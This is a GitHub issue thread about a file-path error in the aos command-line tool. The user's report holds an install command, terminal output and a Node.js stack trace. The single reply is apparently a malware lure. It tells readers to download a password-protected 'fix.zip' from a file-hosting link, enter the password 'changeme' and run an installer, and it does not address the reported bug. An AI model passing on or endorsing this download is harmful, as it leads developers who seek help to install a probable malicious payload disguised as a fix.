### ISSUE TITLE
My project folder is  G:\....，and @permaweb/aos is installed in D:\，then I got the error

### ISSUE THREAD

**Issue by xgocn** [permaweb/aos#332]
My project folder is  G:\....，and @permaweb/aos is installed in D:\，then I got the error

```

(base) PS G:\SOHO\WEB3.0\ARweavepermanDAO\aoapp> npm i -g https://get_ao.g8way.io

added 89 packages in 4s

23 packages are looking for funding
  run `npm fund` for details
(base) PS G:\SOHO\WEB3.0\ARweavepermanDAO\aoapp> aos farm
          _____                   _______                   _____
         /\    \                 /::\    \                 /\    \
        /::\    \               /::::\    \               /::\    \
       /::::\    \             /::::::\    \             /::::\    \
      /::::::\    \           /::::::::\    \           /::::::\    \
     /:::/\:::\    \         /:::/~~\:::\    \         /:::/\:::\    \
    /:::/__\:::\    \       /:::/    \:::\    \       /:::/__\:::\    \
   /::::\   \:::\    \     /:::/    / \:::\    \      \:::\   \:::\    \
  /::::::\   \:::\    \   /:::/____/   \:::\____\   ___\:::\   \:::\    \
 /:::/\:::\   \:::\    \ |:::|    |     |:::|    | /\   \:::\   \:::\    \
/:::/  \:::\   \:::\____\|:::|____|     |:::|    |/::\   \:::\   \:::\____\
\::/    \:::\  /:::/    / \:::\    \   /:::/    / \:::\   \:::\   \::/    /
 \/____/ \:::\/:::/    /   \:::\    \ /:::/    /   \:::\   \:::\   \/____/
          \::::::/    /     \:::\    /:::/    /     \:::\   \:::\    \
           \::::/    /       \:::\__/:::/    /       \:::\   \:::\____\
           /:::/    /         \::::::::/    /         \:::\  /:::/    /
          /:::/    /           \::::::/    /           \:::\/:::/    /
         /:::/    /             \::::/    /             \::::::/    /
        /:::/    /               \::/____/               \::::/    /
        \::/    /                 ~~                      \::/    /
         \/____/                                           \/____/

Welcome to AOS: Your operating system for AO, the decentralized open access supercomputer.
Type ".load-blueprint chat" to join the community chat and ask questions!

AOS Client Version: 1.12.0. 2024
Type "Ctrl-C" twice to exit

Your AOS process:  uhfP3m3kUMUk928K7YH3FAQlKm8oCD1dzRYoRQCp0o8

farm@aos-0.2.1[Inbox:1]> .update
node:fs:456
    return binding.readFileUtf8(path, stringToFlags(options.flag));
                   ^

Error: ENOENT: no such file or directory, open 'G:\nvm\node_global\node_modules\@permaweb\aos\process\utils.lua'
    at Object.readFileSync (node:fs:456:20)
    at file:///D:/nvm/node_global/node_modules/@permaweb/aos/src/commands/os.js:31:23
    at Array.map (<anonymous>)
    at Module.update (file:///D:/nvm/node_global/node_modules/@permaweb/aos/src/commands/os.js:30:6)
    at Interface.<anonymous> (file:///D:/nvm/node_global/node_modules/@permaweb/aos/src/index.js:334:21)
    at Interface.emit (node:events:519:28)
    at [_onLine] [as _onLine] (node:internal/readline/interface:416:12)
    at [_line] [as _line] (node:internal/readline/interface:887:18)
    at [_ttyWrite] [as _ttyWrite] (node:internal/readline/interface:1265:22)
    at ReadStream.onkeypress (node:internal/readline/interface:264:20) {
  errno: -4058,
  code: 'ENOENT',
  syscall: 'open',
  path: 'G:\\nvm\\node_global\\node_modules\\@permaweb\\aos\\process\\utils.lua'
}

Node.js v21.6.2

```

maybe a bug?

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
